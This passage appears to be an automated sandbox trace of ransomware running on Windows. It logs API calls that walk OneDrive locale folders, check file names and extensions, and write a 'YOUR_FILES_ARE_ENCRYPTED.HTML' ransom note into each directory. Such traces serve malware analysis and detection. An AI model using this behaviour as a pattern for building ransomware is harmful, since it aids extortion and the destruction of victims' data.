param_1=0x4ebd136, param_2="%02X" | out: param_1="6B") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="7D") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="17") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="F3") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="AC") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="FB") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="68") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="1D") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="73") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="BB") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="1E") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="12") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="9B") returned 2 
[0162.438] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="02") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="E2") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="6C") returned 2 [0162.439] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="73") returned 2 [0162.439] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="82") returned 2 [0162.439] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="DE") returned 2 [0162.439] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="42") returned 2 [0162.439] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="7F") returned 2 [0162.439] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="90") returned 2 [0162.439] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="0E") returned 2 [0162.440] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\SqmWrapper.dll" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\SqmWrapper.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\SqmWrapper.dll" [0162.440] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0162.440] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0162.440] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaadb2f90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab060850, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab060850, ftLastWriteTime.dwHighDateTime=0x1d709b9, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="sr-cyrl-ba", cAlternateFileName="SR-CYR~1")) returned 1 [0162.441] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-ba") returned 82 [0162.441] GetProcessHeap () returned 0x270000 [0162.441] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.441] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-ba" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-ba") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-ba" [0162.441] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-ba", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-ba\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-ba\\*" [0162.441] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-ba\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaadb2f90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab060850, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab060850, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1388774, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.441] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, 
ftCreationTime.dwLowDateTime=0xaadb2f90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab060850, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab060850, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1388774, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.441] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab060850, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab060850, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab060850, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130b0, dwReserved0=0x1388774, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.441] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-ba\\FileSync.LocalizedResources.dll.mui") returned 118 [0162.442] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.442] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.442] lstrlenW (lpString=".mui") returned 4 [0162.442] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.442] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab060850, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab060850, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab060850, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130b0, dwReserved0=0x1388774, 
dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.442] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.442] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-ba\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0162.442] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-ba\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\sr-cyrl-ba\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.442] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.445] CloseHandle (hObject=0x5ac) returned 1 [0162.446] GetProcessHeap () returned 0x270000 [0162.446] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.446] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab060850, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab2c1e50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab2c1e50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="sr-cyrl-rs", cAlternateFileName="SR-CYR~2")) returned 1 [0162.447] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-rs") returned 82 [0162.447] GetProcessHeap () returned 0x270000 [0162.447] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.447] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-rs" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-rs") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-rs" [0162.447] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-rs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-rs\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-rs\\*" [0162.447] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-rs\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab060850, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab2c1e50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab2c1e50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1388774, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.447] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab060850, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab2c1e50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab2c1e50, ftLastWriteTime.dwHighDateTime=0x1d709b9, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1388774, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.447] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab2c1e50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab2c1e50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab2c1e50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x1388774, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.447] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-rs\\FileSync.LocalizedResources.dll.mui") returned 118 [0162.447] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.447] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.447] lstrlenW (lpString=".mui") returned 4 [0162.448] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.448] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab2c1e50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab2c1e50, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab2c1e50, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x1388774, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.448] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.448] wnsprintfW (in: pszDest=0x74d2010, 
cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-rs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0162.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-cyrl-rs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\sr-cyrl-rs\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.448] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.451] CloseHandle (hObject=0x5ac) returned 1 [0162.451] GetProcessHeap () returned 0x270000 [0162.452] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.452] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab2c1e50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab48aed0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab48aed0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="sr-latn-rs", cAlternateFileName="SR-LAT~1")) returned 1 [0162.452] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-latn-rs") returned 82 [0162.452] GetProcessHeap () returned 0x270000 [0162.452] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.453] lstrcpyW (in: lpString1=0x74d2010, 
lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-latn-rs" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-latn-rs") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-latn-rs" [0162.453] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-latn-rs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-latn-rs\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-latn-rs\\*" [0162.453] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-latn-rs\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab2c1e50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab48aed0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab48aed0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1388774, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.456] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab2c1e50, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab48aed0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab48aed0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1388774, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.456] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab48aed0, 
ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab48aed0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab48aed0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ea8, dwReserved0=0x1388774, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.456] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-latn-rs\\FileSync.LocalizedResources.dll.mui") returned 118 [0162.456] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.456] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.456] lstrlenW (lpString=".mui") returned 4 [0162.456] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.456] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab48aed0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab48aed0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab48aed0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ea8, dwReserved0=0x1388774, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.456] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.456] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-latn-rs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0162.456] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sr-latn-rs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\sr-latn-rs\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0162.467] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.506] CloseHandle (hObject=0x5ac) returned 1 [0162.507] GetProcessHeap () returned 0x270000 [0162.507] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.507] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab48aed0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab5bb9d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab5bb9d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="sv", cAlternateFileName="")) returned 1 [0162.508] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sv") returned 74 [0162.508] GetProcessHeap () returned 0x270000 [0162.508] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.508] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sv") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sv" [0162.508] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sv", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sv\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sv\\*" [0162.508] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sv\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab48aed0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab5bb9d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab5bb9d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1388774, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.511] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xab48aed0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab5bb9d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab5bb9d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1388774, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.511] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab5bb9d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab5bb9d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab5bb9d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x122a8, 
dwReserved0=0x1388774, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.511] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sv\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.511] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.511] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.511] lstrlenW (lpString=".mui") returned 4 [0162.511] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.511] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab5bb9d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xab5bb9d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xab5bb9d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x122a8, dwReserved0=0x1388774, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.511] FindClose (in: hFindFile=0x42f3280 | out: 